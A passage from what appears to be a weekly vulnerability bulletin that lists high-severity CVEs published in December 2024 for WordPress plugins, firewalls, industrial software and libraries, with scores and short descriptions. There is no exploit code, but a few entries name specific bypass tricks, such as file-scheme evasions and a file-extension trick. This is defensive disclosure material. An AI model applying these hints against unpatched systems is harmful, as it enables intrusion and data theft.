| Mikado-Themes--Biagiotti Membership |
The Biagiotti Membership plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.0.2. This is due to the plugin not properly verifying a user's identity prior to authenticating them. This makes it possible for unauthenticated attackers to log in as other users, such as administrators, granted they have access to an email. | 2024-12-18 | 9.8 | CVE-2024-12287 |
| Mike Leembruggen--Critical Site Intel |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mike Leembruggen Critical Site Intel allows SQL Injection.This issue affects Critical Site Intel: from n/a through 1.0. | 2024-12-16 | 9.3 | CVE-2024-55976 |
| Milestone Systems--XProtect VMS |
Disclosure of sensitive information in HikVision camera driver's log file in XProtect Device Pack allows an attacker to read camera credentials stored in the Recording Server under specific conditions. | 2024-12-19 | 7.5 | CVE-2024-12569 |
| misskey-dev--misskey |
Misskey is an open source, federated social media platform. In affected versions FileServerService (media proxy) in github.com/misskey-dev/misskey 2024.10.1 or earlier did not detect proxy loops, which allows remote actors to execute a self-propagating reflected/amplified distributed denial-of-service via a maliciously crafted note. FileServerService.prototype.proxyHandler did not check incoming requests are not coming from another proxy server. An attacker can execute an amplified denial-of-service by sending a nested proxy request to the server and end the request with a malicious redirect back to another nested proxy request. Leading to unbounded recursion until the original request is timed out. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. Users unable to upgrade may configure the reverse proxy to block requests to the proxy with an empty User-Agent header or one containing Misskey/. An attacker can not effectively modify the User-Agent header without making another request to the server. | 2024-12-18 | 7.4 | CVE-2024-49363 |
| moaluko--Store Locator for WordPress with Google Maps LotsOfLocales |
The Store Locator for WordPress with Google Maps - LotsOfLocales plugin for WordPress is vulnerable to Local File Inclusion in version 3.98.9 via the 'sl_engine' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2024-12-20 | 9.8 | CVE-2024-12571 |
| Mobil365 Informatics--Saha365 App |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mobil365 Informatics Saha365 App allows SQL Injection.This issue affects Saha365 App: before 30.09.2024. | 2024-12-17 | 9.8 | CVE-2024-8972 |
| Mohamed Riyaz--Admin Customization |
Cross-Site Request Forgery (CSRF) vulnerability in Mohamed Riyaz Admin Customization allows Stored XSS.This issue affects Admin Customization: from n/a through 2.2. | 2024-12-16 | 7.1 | CVE-2024-54431 |
| Molefed--tydskrif |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Molefed allows Reflected XSS.This issue affects tydskrif: from n/a through 1.1.3. | 2024-12-16 | 7.1 | CVE-2024-54257 |
| n/a--bun |
Versions of the package bun before 1.1.30 are vulnerable to Prototype Pollution due to improper input sanitization. An attacker can exploit this vulnerability through Bun's APIs that accept objects. | 2024-12-18 | 7.5 | CVE-2024-21548 |
| n/a--CK and SyntaxHighlighter |
Cross-Site Request Forgery (CSRF) vulnerability in CK and SyntaxHighlighter allows Stored XSS.This issue affects CK and SyntaxHighlighter: from n/a through 3.4.2. | 2024-12-16 | 7.1 | CVE-2024-54407 |
| n/a--n/a |
Buffer Overflow vulnerability in radarorg radare2 v.5.8.8 allows an attacker to execute arbitrary code via the name, type, or group fields. | 2024-12-17 | 9.8 | CVE-2024-29646 |
| n/a--n/a |
Buffer Overflow vulnerability in NEXTU FLATA AX1500 Router v.1.0.2 allows a remote attacker to execute arbitrary code via the POST request handler component. | 2024-12-16 | 9.8 | CVE-2024-29671 |
| n/a--n/a |
rizin before v0.6.3 is vulnerable to Improper Neutralization of Special Elements via meta_set function in librz/analysis/meta. | 2024-12-17 | 9.1 | CVE-2024-31668 |
| n/a--n/a |
iptraf-ng 1.2.1 has a stack-based buffer overflow. | 2024-12-16 | 9.8 | CVE-2024-52949 |
| n/a--n/a |
Dante 1.4.0 through 1.4.3 (fixed in 1.4.4) has incorrect access control for some sockd.conf configurations involving socksmethod. | 2024-12-17 | 9.1 | CVE-2024-54662 |
| n/a--n/a |
GetSimple CMS CE 3.3.19 suffers from arbitrary code execution in the template editing function in the background management system, which can be used by an attacker to implement RCE. | 2024-12-16 | 9.8 | CVE-2024-55085 |
| n/a--n/a |
A vulnerability has been found in the 1000projects Bookstore Management System PHP MySQL Project 1.0. This issue affects some unknown functionality of add_company.php. Actions on the delete parameter result in SQL injection. | 2024-12-17 | 9.1 | CVE-2024-55496 |
| n/a--n/a |
A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200, and MSG2300 3.90. The component affected by this issue is /upload_netaction.php on the web interface. By crafting a suitable form name, arbitrary files can be uploaded, potentially leading to unauthorized access to server permissions. | 2024-12-17 | 9.1 | CVE-2024-55513 |
| n/a--n/a |
A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200, and MSG2300 3.90. The component affected by this issue is /upload_ipslib.php on the web interface. By crafting a suitable form name, arbitrary files can be uploaded. | 2024-12-17 | 9.8 | CVE-2024-55515 |
| n/a--n/a |
A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200, and MSG2300 v3.90. The component affected by this issue is /upload_sysconfig.php on the web interface. By crafting a suitable form name, arbitrary files can be uploaded, potentially leading to unauthorized access to server permissions. | 2024-12-17 | 9.1 | CVE-2024-55516 |
| n/a--n/a |
ui/pref/ProxyPrefView.java in weasis-core in Weasis 4.5.1 has a hardcoded key for symmetric encryption of proxy credentials. | 2024-12-16 | 9.8 | CVE-2024-55557 |
| n/a--n/a |
A flaw was found in the MustGather.managed.openshift.io Custom Defined Resource (CRD) of OpenShift Dedicated. A non-privileged user on the cluster can create a MustGather object with a specially crafted file and set the most privileged service account to run the job. This can allow a standard developer user to escalate their privileges to a cluster administrator and pivot to the AWS environment. | 2024-12-19 | 8.8 | CVE-2024-25131 |
| n/a--n/a |
Improper access control in the endpoint /RoleMenuMapping/AddRoleMenu of Digiteam v4.21.0.0 allows authenticated attackers to escalate privileges. | 2024-12-20 | 8.8 | CVE-2024-37758 |
| n/a--n/a |
A Cross-Site Request Forgery (CSRF) in Sunbird DCIM dcTrack v9.1.2 allows authenticated attackers to escalate their privileges by forcing an Administrator user to perform sensitive requests in some admin screens. | 2024-12-16 | 8 | CVE-2024-37774 |
| n/a--n/a |
CyberPanel before 2.3.8 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the phpSelection field to the websites/submitWebsiteCreation URI. | 2024-12-16 | 8.8 | CVE-2024-53376 |
| n/a--n/a |
GetSimple CMS CE 3.3.19 is vulnerable to Server-Side Request Forgery (SSRF) in the backend plugin module. | 2024-12-18 | 8.8 | CVE-2024-55088 |
| n/a--n/a |
Cognition Devin before 2024-12-12 provides write access to code by an attacker who discovers the https://vscode-randomly_generated_string.devinapps.com URL (aka the VSCode live share URL) for a specific "Use Devin's Machine" session. For example, this URL may be discovered if a customer posts a screenshot of a Devin session to social media, or publicly streams their Devin session. | 2024-12-16 | 8.1 | CVE-2024-56083 |
| n/a--n/a |
In Optimizely Configured Commerce before 5.2.2408, malicious payloads can be stored and subsequently executed in users' browsers under specific conditions: XSS from client-side template injection in search history. | 2024-12-18 | 8.1 | CVE-2024-56174 |
| n/a--n/a |
A NULL pointer dereference in D-Link DAP-1513 REVA_FIRMWARE_1.01 allows attackers to cause a Denial of Service (DoS) via a crafted web request without authentication. The vulnerability occurs in the /bin/webs binary of the firmware. When /bin/webs receives a carefully constructed HTTP request, it will crash and exit due to a null pointer reference, leading to a denial of service attack to the device. | 2024-12-17 | 7.5 | CVE-2024-36832 |
| n/a--n/a |
Incorrect access control in Sunbird DCIM dcTrack v9.1.2 allows attackers to create or update a ticket with a location which bypasses an RBAC check. | 2024-12-16 | 7.5 | CVE-2024-37775 |
| n/a--n/a |
Databricks JDBC Driver before 2.6.40 could potentially allow remote code execution (RCE) by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achieve Remote Code Execution in the context of the driver by tricking a victim into using a crafted connection URL that uses the property krbJAASFile. | 2024-12-17 | 7.3 | CVE-2024-49194 |
| n/a--n/a |
Keyfactor Command before 12.5.0 has Incorrect Access Control: access tokens are over permissioned, aka 64099. The fixed versions are 11.5.1.1, 11.5.2.1, 11.5.3.1, 11.5.4.5, 11.5.6.1, 11.6.0, 12.2.0.1, 12.3.0.1, 12.4.0.1, 12.5.0, and 24.4.0. | 2024-12-18 | 7.6 | CVE-2024-49202 |
| n/a--n/a |
An issue in H3C switch h3c-S1526 allows a remote attacker to obtain sensitive information via the S1526.cfg component. | 2024-12-17 | 7.5 | CVE-2024-51175 |
| n/a--n/a |
A SQL Injection vulnerability was found in /index.php in PHPGurukul Pre-School Enrollment System v1.0, which allows remote attackers to execute arbitrary code via the visittime parameter. | 2024-12-19 | 7.5 | CVE-2024-54790 |
| n/a--n/a |
In the GetSimple CMS CE 3.3.19 management page, Server-Side Request Forgery (SSRF) can be achieved in the plug-in download address in the backend management system. | 2024-12-18 | 7.2 | CVE-2024-55086 |
| n/a--n/a |
Online Nurse Hiring System v1.0 was discovered to contain a SQL injection vulnerability in the component /admin/profile.php via the fullname parameter. | 2024-12-16 | 7.2 | CVE-2024-55103 |
| n/a--n/a |
Online Nurse Hiring System v1.0 was discovered to contain multiple SQL injection vulnerabilities in the component /admin/add-nurse.php via the gender and emailid parameters. | 2024-12-16 | 7.2 | CVE-2024-55104 |
| n/a--n/a |
Oqtane Framework 6.0.0 is vulnerable to Incorrect Access Control. By manipulating the entityid parameter, attackers can bypass passcode validation and successfully log into the application or access restricted data without proper authorization. The lack of server-side validation exacerbates the issue, as the application relies on client-side information for authentication. | 2024-12-20 | 7.5 | CVE-2024-55470 |
| n/a--n/a |
An issue was discovered in Logpoint UniversalNormalizer before 5.7.0. Authenticated users can inject payloads while creating Universal Normalizer. These are executed, leading to Remote Code Execution. | 2024-12-16 | 7.1 | CVE-2024-56084 |
| n/a--n/a |
An issue was discovered in Logpoint before 7.5.0. Authenticated users can inject payloads in Report Templates. These are executed when the backup process is initiated, leading to Remote Code Execution. | 2024-12-16 | 7.1 | CVE-2024-56086 |
| n/a--n/a |
A flaw was found in Open Cluster Management (OCM) when a user has access to the worker nodes which contain the cluster-manager or klusterlet deployments. The cluster-manager deployment uses a service account with the same name "cluster-manager" which is bound to a ClusterRole also named "cluster-manager", which includes the permission to create Pod resources. If this deployment runs a pod on an attacker-controlled node, the attacker can obtain the cluster-manager's token and steal any service account token by creating and mounting the target service account to control the whole cluster. | 2024-12-17 | 7.5 | CVE-2024-9779 |
| n/a--spatie/browsershot |
Versions of the package spatie/browsershot before 5.0.2 are vulnerable to Directory Traversal due to URI normalisation in the browser where the file:// check can be bypassed with file:\\. An attacker could read any file on the server by exploiting the normalization of \ into /. | 2024-12-18 | 7.5 | CVE-2024-21547 |
| n/a--spatie/browsershot |
Versions of the package spatie/browsershot before 5.0.3 are vulnerable to Improper Input Validation due to improper URL validation through the setUrl method. An attacker can exploit this vulnerability by utilizing view-source:file://, which allows for arbitrary file reading on a local file. **Note:** This is a bypass of the fix for [CVE-2024-21544](https://security.snyk.io/vuln/SNYK-PHP-SPATIEBROWSERSHOT-8496745). | 2024-12-20 | 7.5 | CVE-2024-21549 |
| N/A--Spring Framework |
Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running. | 2024-12-19 | 7.5 | CVE-2024-38819 |
| n/a--unisharp/laravel-filemanager |
Versions of the package unisharp/laravel-filemanager before 2.9.1 are vulnerable to Remote Code Execution (RCE) through using a valid mimetype and inserting the . character after the php file extension. This allows the attacker to execute malicious code. | 2024-12-18 | 9.8 | CVE-2024-21546 |
| Nabajit Roy--Nabz Image Gallery |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nabajit Roy Nabz Image Gallery allows SQL Injection.This issue affects Nabz Image Gallery: from n/a through v1.00. | 2024-12-16 | 9.3 | CVE-2024-55981 |
| Nagvis--Nagvis |
Improper neutralization of input in Nagvis before version 1.9.42 which can lead to XSS | 2024-12-19 | 8.8 | CVE-2024-47093 |
| Navdeep Kumar--Wp Login with Ajax |
Cross-Site Request Forgery (CSRF) vulnerability in Navdeep Kumar Wp Login with Ajax allows Stored XSS.This issue affects Wp Login with Ajax: from n/a through 0.6. | 2024-12-16 | 7.1 | CVE-2024-54416 |
| Nazmul Ahsan--MDC Comment Toolbar |
Cross-Site Request Forgery (CSRF) vulnerability in Nazmul Ahsan MDC Comment Toolbar allows Stored XSS.This issue affects MDC Comment Toolbar: from n/a through 1.1. | 2024-12-16 | 7.1 | CVE-2024-54404 |
| nexryai--altair |
Altair is a fork of Misskey v12. Affected versions lack of request validation and lack of authentication in the image proxy for compressing and resizing remote files could allow attacks that could affect availability, such as by abnormally increasing the CPU usage of the server on which this software is running or placing a heavy load on the network it is using. This issue has been fixed in v12.24Q4.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-19 | 8.6 | CVE-2024-56200 |
| NI--DAQExpress |
A deserialization of untrusted data vulnerability exists in NI DAQExpress that may result in remote code execution. Successful exploitation requires an attacker to get a user to open a specially crafted project file. This vulnerability affects DAQExpress 5.1 and prior versions. Â Please note that DAQExpress is an EOL product and will not receive any updates. | 2024-12-18 | 7.8 | CVE-2024-12741 |
| nssTheme--Wp NssUser Register |
Incorrect Privilege Assignment vulnerability in nssTheme Wp NssUser Register allows Privilege Escalation.This issue affects Wp NssUser Register: from n/a through 1.0.0. | 2024-12-16 | 9.8 | CVE-2024-54363 |
| onigetoc--Add image to Post |
Cross-Site Request Forgery (CSRF) vulnerability in onigetoc Add image to Post allows Stored XSS.This issue affects Add image to Post: from n/a through 0.6. | 2024-12-16 | 7.1 | CVE-2024-54428 |
| OpenText--Privileged Access Manager |
In a specific scenario a LDAP user can abuse the authentication process in OpenText Privileged Access Manager that allows authentication bypass. This issue affects Privileged Access Manager version 23.3(4.4); 24.3(4.5) | 2024-12-19 | 8 | CVE-2024-12111 |
| OPPO--OPPO Store APP |
In OPPO Store APP, there's a possible escalation of privilege due to improper input validation. | 2024-12-18 | 9.8 | CVE-2024-1610 |
| outstrip--Instant Appointment |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in outstrip Instant Appointment allows SQL Injection.This issue affects Instant Appointment: from n/a through 1.2. | 2024-12-16 | 9.3 | CVE-2024-54361 |
| Pearlbells--Flash News / Post (Responsive) |
Cross-Site Request Forgery (CSRF) vulnerability in Pearlbells Flash News / Post (Responsive) allows Privilege Escalation.This issue affects Flash News / Post (Responsive): from n/a through 4.1. | 2024-12-16 | 9.8 | CVE-2024-56012 |
| Phoetry--phZoom |
Cross-Site Request Forgery (CSRF) vulnerability in Phoetry phZoom allows Stored XSS.This issue affects phZoom: from n/a through 1.2.92. | 2024-12-16 | 7.1 | CVE-2024-54434 |
| Phuc Pham--Multiple Admin Emails |
Cross-Site Request Forgery (CSRF) vulnerability in Phuc Pham Multiple Admin Emails allows Cross Site Request Forgery.This issue affects Multiple Admin Emails: from n/a through 1.0. | 2024-12-16 | 7.1 | CVE-2024-54388 |
| Pierre Lannoy / PerfOps One--Device Detector |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pierre Lannoy / PerfOps One Device Detector allows Reflected XSS.This issue affects Device Detector: from n/a through 4.2.0. | 2024-12-18 | 7.1 | CVE-2024-56010 |
| Project Caruso--Flaming Forms |
Cross-Site Request Forgery (CSRF) vulnerability in Project Caruso Flaming Forms allows Stored XSS.This issue affects Flaming Forms: from n/a through 1.0.1. | 2024-12-16 | 7.1 | CVE-2024-54398 |
| QNAP Systems Inc.--QuLog Center |
A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained user access to bypass security mechanisms or read application data. We have already fixed the vulnerability in the following versions: QuLog Center 1.5.0.738 ( 2023/03/06 ) and later QuLog Center 1.4.1.691 ( 2023/03/01 ) and later QuLog Center 1.3.1.645 ( 2023/02/22 ) and later | 2024-12-19 | 7.3 | CVE-2023-23354 |
| QNAP Systems Inc.--QVPN Windows |
An insecure library loading vulnerability has been reported to affect QVPN Device Client. If exploited, the vulnerability could allow local attackers who have gained user access to execute unauthorized code or commands. We have already fixed the vulnerability in the following versions: QVPN Windows 2.0.0.1316 and later QVPN Windows 2.0.0.1310 and later | 2024-12-19 | 7.8 | CVE-2022-27595 |
| Quietly--Quietly Insights |
Missing Authorization vulnerability in Quietly Quietly Insights allows Privilege Escalation.This issue affects Quietly Insights: from n/a through 1.2.2. | 2024-12-16 | 8.8 | CVE-2024-54378 |
| Reza Moallemi--Comments On Feed |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Reza Moallemi Comments On Feed allows Reflected XSS.This issue affects Comments On Feed: from n/a through 1.2.1. | 2024-12-16 | 7.1 | CVE-2024-54406 |
| richteam--Share Buttons Social Media |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in richteam Share Buttons - Social Media allows Blind SQL Injection.This issue affects Share Buttons - Social Media: from n/a through 1.0.2. | 2024-12-16 | 9.3 | CVE-2024-55982 |
| Ritesh Sanap--Advanced What should we write next about |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ritesh Sanap Advanced What should we write next about allows SQL Injection.This issue affects Advanced What should we write next about: from n/a through 1.0.3. | 2024-12-16 | 8.5 | CVE-2024-55987 |
| robfelty--Collapsing Categories |
The Collapsing Categories plugin for WordPress is vulnerable to SQL Injection via the 'taxonomy' parameter of the /wp-json/collapsing-categories/v1/get REST API in all versions up to, and including, 3.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-18 | 7.5 | CVE-2024-12025 |
| Rohit Urane--Dr Affiliate |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Rohit Urane Dr Affiliate allows SQL Injection.This issue affects Dr Affiliate: from n/a through 1.2.3. | 2024-12-18 | 8.5 | CVE-2024-55975 |
| Ruben Garza, Jr.--GitSync |
Cross-Site Request Forgery (CSRF) vulnerability in Ruben Garza, Jr. GitSync allows Code Injection.This issue affects GitSync: from n/a through 1.1.0. | 2024-12-16 | 9.6 | CVE-2024-54368 |
| rubengc--AutomatorWP The #1 automator plugin for no-code automation in WordPress |
The AutomatorWP - Automator plugin for no-code automations, webhooks & custom integrations in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'a-0-o-search_field_value' parameter in all versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. When used in conjunction with the plugin's import and code action feature, this vulnerability can be leveraged to execute arbitrary code. | 2024-12-19 | 9.6 | CVE-2024-12626 |
| Ryan Nystrom--TSB Occasion Editor |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ryan Nystrom TSB Occasion Editor allows SQL Injection.This issue affects TSB Occasion Editor: from n/a through 1.2.1. | 2024-12-16 | 8.5 | CVE-2024-55973 |
| Ryan Scott--Visual Recent Posts |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ryan Scott Visual Recent Posts allows Reflected XSS.This issue affects Visual Recent Posts: from n/a through 1.2.3. | 2024-12-16 | 7.1 | CVE-2024-54403 |
| Sabri Taieb--Sogrid |
Cross-Site Request Forgery (CSRF) vulnerability in Sabri Taieb Sogrid allows Privilege Escalation.This issue affects Sogrid: from n/a through 1.5.2. | 2024-12-16 | 8.8 | CVE-2024-54352 |
| Sabri Taieb--Sogrid |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Sabri Taieb Sogrid allows PHP Local File Inclusion.This issue affects Sogrid: from n/a through 1.5.6. | 2024-12-16 | 7.5 | CVE-2024-54374 |
| Sabri Taieb--Woolook |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Sabri Taieb Woolook allows PHP Local File Inclusion.This issue affects Woolook: from n/a through 1.7.0. | 2024-12-16 | 7.5 | CVE-2024-54375 |
| Sanjay Singh Negi--Floating Video Player |
Cross-Site Request Forgery (CSRF) vulnerability in Sanjay Singh Negi Floating Video Player allows Stored XSS.This issue affects Floating Video Player: from n/a through 1.0. | 2024-12-16 | 7.1 | CVE-2024-54421 |
| Saoshyant--Saoshyant Element |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saoshyant Saoshyant Element allows Reflected XSS.This issue affects Saoshyant Element: from n/a through 1.2. | 2024-12-18 | 7.1 | CVE-2024-51646 |
| Saul Morales Pacheco--Banner System |
Missing Authorization vulnerability in Saul Morales Pacheco Banner System allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Banner System: from n/a through 1.0.0. | 2024-12-16 | 8.2 | CVE-2024-54359 |
| Schneider Electric--Harmony (Formerly Magelis) HMIST6, HMISTM6, HMIG3U, HMIG3X, HMISTO7 series with EcoStruxure Operator Terminal Expert runtime |
CWE-1104: Use of Unmaintained Third-Party Components vulnerability exists that could cause complete control of the device when an authenticated user installs malicious code into HMI product. | 2024-12-17 | 8.8 | CVE-2024-11999 |
| Sciener--TTLock App |
A specially crafted message can be sent to the TTLock App that downgrades the encryption protocol used for communication, and can be utilized to compromise the lock, such as through revealing the unlockKey field. | 2024-12-19 | 7.5 | CVE-2023-7005 |
| scriptsbundle--AdForest |
The AdForest theme for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.1.6. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the sb_login_user_with_otp_fun() function. This makes it possible for unauthenticated attackers to log in as arbitrary users, including administrators. | 2024-12-21 | 9.8 | CVE-2024-11349 |
| sebhildebrandt--systeminformation |
systeminformation is a System and OS information library for node.js. In affected versions SSIDs are not sanitized when before they are passed as a parameter to cmd.exe in the `getWindowsIEEE8021x` function. This means that malicious content in the SSID can be executed as OS commands. This vulnerability may enable an attacker, depending on how the package is used, to perform remote code execution or local privilege escalation. This issue has been addressed in version 5.23.7 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-20 | 7.8 | CVE-2024-56334 |
| SeedProd LLC--SeedProd Pro |
Unrestricted Upload of File with Dangerous Type vulnerability in SeedProd LLC SeedProd Pro allows Upload a Web Shell to a Web Server.This issue affects SeedProd Pro: from n/a through 6.18.10. | 2024-12-16 | 9.1 | CVE-2024-54285 |
| SeedProd LLC--SeedProd Pro |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SeedProd LLC SeedProd Pro allows SQL Injection.This issue affects SeedProd Pro: from n/a through 6.18.10. | 2024-12-16 | 7.6 | CVE-2024-54283 |
| SeedProd LLC--SeedProd Pro |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SeedProd LLC SeedProd Pro allows SQL Injection.This issue affects SeedProd Pro: from n/a through 6.18.10. | 2024-12-16 | 7.6 | CVE-2024-54284 |
| serviceonline--Service |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in serviceonline Service allows Blind SQL Injection.This issue affects Service: from n/a through 1.0.4. | 2024-12-16 | 8.5 | CVE-2024-55986 |
| Shambhu Prasad Patnaik--WP Flipkart Importer |
Cross-Site Request Forgery (CSRF) vulnerability in Shambhu Prasad Patnaik WP Flipkart Importer allows Stored XSS.This issue affects WP Flipkart Importer: from n/a through 1.4. | 2024-12-16 | 7.1 | CVE-2024-54432 |
| Sheikh Heera--WP Fiddle |
Cross-Site Request Forgery (CSRF) vulnerability in Sheikh Heera WP Fiddle allows Stored XSS.This issue affects WP Fiddle: from n/a through 1.0. | 2024-12-16 | 7.1 | CVE-2024-54393 |
| shinephp--User Role Editor |
The User Role Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.64.3. This is due to missing or incorrect nonce validation on the update_roles() function. This makes it possible for unauthenticated attackers to add or remove roles for arbitrary users, including escalating their privileges to administrator, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-17 | 8.8 | CVE-2024-12293 |
| ShineTheme--Travel Booking WordPress Theme |
The Travel Booking WordPress Theme theme for WordPress is vulnerable to blind time-based SQL Injection via the 'order_id' parameter in all versions up to, and including, 3.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-18 | 7.5 | CVE-2024-11912 |
| Siemens--Opcenter Execution Foundation |
A vulnerability has been identified in Opcenter Execution Foundation (All versions), Opcenter Intelligence (All versions), Opcenter Quality (All versions), Opcenter RDL (All versions), SIMATIC PCS neo V4.0 (All versions), SIMATIC PCS neo V4.1 (All versions), SIMATIC PCS neo V5.0 (All versions < V5.0 Update 1), SINEC NMS (All versions if operated in conjunction with UMC < V2.15), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions), Totally Integrated Automation Portal (TIA Portal) V19 (All versions). Affected products contain a heap-based buffer overflow vulnerability in the integrated UMC component. This could allow an unauthenticated remote attacker to execute arbitrary code. | 2024-12-16 | 9.8 | CVE-2024-49775 |
| Sierra Wireless--AirVantage, AirVantage-Capable Devices: All Sierra Wireless devices. |
The AirVantage platform is vulnerable to an unauthorized attacker registering previously unregistered devices on the AirVantage platform when the owner has not disabled the AirVantage Management Service on the devices or registered the device. This could enable an attacker to configure, manage, and execute AT commands on an unsuspecting user's devices. | 2024-12-21 | 8.1 | CVE-2023-31279 |
| Simple Booking--Simple Booking Widget |
Cross-Site Request Forgery (CSRF) vulnerability in Simple Booking Simple Booking Widget allows Stored XSS.This issue affects Simple Booking Widget: from n/a through 1.1. | 2024-12-16 | 7.1 | CVE-2024-54433 |
| smsaexpress--SMSA Shipping(official) |
The SMSA Shipping(official) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the smsa_delete_label() function in all versions up to, and including, 2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). | 2024-12-21 | 8.8 | CVE-2024-12066 |
| Soflyy--WP All Import Pro |
The WP All Import Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.9.3 due to missing SSRF protection on the pmxi_curl_download function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. On cloud platforms, it might allow attackers to read the Instance metadata. | 2024-12-17 | 7.6 | CVE-2024-9624 |
| SoftLab--Radio Player |
Server-Side Request Forgery (SSRF) vulnerability in SoftLab Radio Player allows Server Side Request Forgery.This issue affects Radio Player: from n/a through 2.0.82. | 2024-12-16 | 7.2 | CVE-2024-54385 |
| Sophos--Sophos Firewall |
A pre-auth SQL injection vulnerability in the email protection feature of Sophos Firewall versions older than 21.0 MR1 (21.0.1) allows access to the reporting database and can lead to remote code execution if a specific configuration of Secure PDF eXchange (SPX) is enabled in combination with the firewall running in High Availability (HA) mode. | 2024-12-19 | 9.8 | CVE-2024-12727 |
| Sophos--Sophos Firewall |
A weak credentials vulnerability potentially allows privileged system access via SSH to Sophos Firewall older than version 20.0 MR3 (20.0.3). | 2024-12-19 | 9.8 | CVE-2024-12728 |
| Sophos--Sophos Firewall |
A post-auth code injection vulnerability in the User Portal allows authenticated users to execute code remotely in Sophos Firewall older than version 21.0 MR1 (21.0.1). | 2024-12-19 | 8.8 | CVE-2024-12729 |
| Sourov Amin--Insertify |
Cross-Site Request Forgery (CSRF) vulnerability in Sourov Amin Insertify allows Code Injection.This issue affects Insertify: from n/a through 1.1.4. | 2024-12-16 | 9.6 | CVE-2024-54372 |
| Spartac--Feedpress Generator |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spartac Feedpress Generator allows Reflected XSS.This issue affects Feedpress Generator: from n/a through 1.2.1. | 2024-12-16 | 7.1 | CVE-2024-54364 |
| Spider-themes--EazyDocs |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Spider-themes EazyDocs.This issue affects EazyDocs: from n/a through 2.5.5. | 2024-12-16 | 7.5 | CVE-2024-54376 |
| spreadr--Spreadr Woocommerce |
Missing Authorization vulnerability in spreadr Spreadr Woocommerce allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Spreadr Woocommerce: from n/a through 1.0.4. | 2024-12-18 | 7.5 | CVE-2024-56008 |
| Stefan Brandt--Display Future Posts |
Cross-Site Request Forgery (CSRF) vulnerability in Stefan Brandt Display Future Posts allows Stored XSS.This issue affects Display Future Posts: from n/a through 0.2.3. | 2024-12-16 | 7.1 | CVE-2024-54413 |
| Straightvisions GmbH--SV100 Companion |
Incorrect Privilege Assignment vulnerability in Straightvisions GmbH SV100 Companion allows Privilege Escalation.This issue affects SV100 Companion: from n/a through 2.0.02. | 2024-12-16 | 9.8 | CVE-2024-54229 |
| SuitePlugins--Video & Photo Gallery for Ultimate Member |
Unrestricted Upload of File with Dangerous Type vulnerability in SuitePlugins Video & Photo Gallery for Ultimate Member allows Upload a Web Shell to a Web Server.This issue affects Video & Photo Gallery for Ultimate Member: from n/a through 1.1.0. | 2024-12-16 | 9.9 | CVE-2024-54370 |
| SUNNET Technology Co., Ltd.--Corporate Training Management System |
